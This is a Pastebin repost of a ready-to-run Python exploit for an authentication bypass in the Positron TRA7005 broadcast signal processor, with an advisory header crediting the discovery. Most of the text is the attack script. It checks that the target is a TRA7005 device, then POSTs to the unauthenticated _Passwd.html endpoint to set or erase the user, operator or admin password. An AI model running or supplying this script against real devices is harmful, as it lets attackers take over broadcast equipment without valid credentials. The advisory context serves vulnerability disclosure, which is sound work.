Advertisement
FlyFar

Positron Broadcast Signal Processor TRA7005 v1.20 - Authentication Bypass

Apr 11th, 2024
631
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.07 KB | Cybersecurity | 0 0
  1. # Exploit Title: Positron Broadcast Signal Processor TRA7005 v1.20 - Authentication Bypass
  2. # Author: LiquidWorm
  3. # Vendor: Positron srl
  4. # Product web page: https://www.positron.it
  5. #                   https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/
  6. # Affected version: 1.20
  7. #                   TRA7K5_REV107
  8. #                   TRA7K5_REV106
  9. #                   TRA7K5_REV104
  10. #                   TRA7K5_REV102
  11. #
  12. # Summary: The TRA7000 series is a set of products dedicated to broadcast, designed to
  13. # guarantee an excellent quality-price ratio in compliance with current regulations and
  14. # intended for individual broadcasters or radio networks. All models in the TRA7000 series
  15. # are fully digital, using only high-quality components such as 24-bit A/D and D/A converters
  16. # and 32-bit DSP. The TRA7005 performs the functions of Stereo Coder, RDS Coder, 5-output
  17. # MPX Distributor, AGC (adjustable) for both analogue and digital audio inputs, Clipper
  18. # for both analogue and digital audio inputs, change-over emergency switching between any
  19. # input with adjustable thresholds and intervention times, both in the switching phase on
  20. # the secondary source and in the return phase to the primary source. Ethernet connection
  21. # with Web-Server (optional) for total control and management of the device. Advanced BYPASS
  22. # system between MPX input and outputs, active on operating and power supply anomalies and
  23. # can also be activated remotely.
  24. #
  25. # Desc: The Positron Broadcast Digital Signal Processor TRA7005 suffers from an authentication
  26. # bypass through a direct and unauthorized access to the password management functionality.
  27. # The vulnerability allows attackers to bypass Digest authentication by manipulating the
  28. # password endpoint _Passwd.html and its payload data to set a user's password to arbitrary
  29. # value or remove it entirely. This grants unauthorized access to protected areas (/user,
  30. # /operator, /admin) of the application without requiring valid credentials, compromising
  31. # the device's system security.
  32. #
  33. # Tested on: Positron Web Server
  34. #
  35. #
  36. # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  37. #                             @zeroscience
  38. #
  39. #
  40. # Advisory ID: ZSL-2024-5813
  41. # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5813.php
  42. #
  43. #
  44. # 22.03.2024
  45. #
  46. #
  47.  
  48.  
  49. import requests,sys
  50.  
  51. print("""
  52. ______________________________________
  53. ┏┳┓•      ┏┓            ┓  ┏┓    ┓  •
  54. ┃ ┓┏┓┓┏  ┃┃┏┓┏┏┓┏┏┏┓┏┓┏┫  ┣ ┓┏┏┓┃┏┓┓╋
  55. ┻ ┗┛┗┗┫  ┣┛┗┻┛┛┗┻┛┗┛┛ ┗┻  ┗┛┛┗┣┛┗┗┛┗┗
  56.       ┛                       ┛
  57.                 for
  58.   Positron Digital Signal Processor
  59.             ZSL-2024-5813
  60. ______________________________________
  61. """)
  62.  
  63. if len(sys.argv) != 4:
  64.     print("Usage: python positron.py <ip:port> <user/oper/admin> <erase/new_pwd>")
  65.     sys.exit(1)
  66.  
  67. ip = sys.argv[1]
  68. ut = sys.argv[2]
  69. wa = sys.argv[3]
  70.  
  71. valid_ut = ['user', 'oper', 'admin']
  72. if ut.lower() not in valid_ut:
  73.     print("Invalid user type! Use 'user', 'oper', or 'admin'.")
  74.     sys.exit(1)
  75.  
  76. url = f'http://{ip}/_Passwd.html'
  77. did = f'http://{ip}/_Device.html'
  78.  
  79. try:
  80.     r = requests.get(did)
  81.     if r.status_code == 200 and 'TRA7K5' in r.text:
  82.         print("Vulnerable processor found!")
  83.     else:
  84.         print("Not Vulnerable or not applicable. Exploit exiting.")
  85.         sys.exit(1)
  86. except requests.exceptions.RequestException as e:
  87.     print(f"Error checking device: {e}")
  88.     sys.exit(1)
  89.  
  90. headers = {
  91.     'Content-Type'   : 'application/x-www-form-urlencoded',
  92.     'Accept-Language': 'mk-MK,en;q=0.6',
  93.     'Accept-Encoding': 'gzip, deflate',
  94.     'User-Agent'     : 'R-Marina/11.9',
  95.     'Accept'         : '*/*'
  96. }
  97.  
  98. payload = {}
  99. if wa.lower() == 'erase':
  100.     payload[f'PSW_{ut.capitalize()}'] = 'NONE'
  101. else:
  102.     payload_key = f'PSW_{ut.capitalize()}'
  103.     payload[payload_key] = wa
  104.     #print(payload)
  105.  
  106. r = requests.post(url, headers=headers, data=payload)
  107. print(r.status_code)
  108. print(r.text)
  109.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement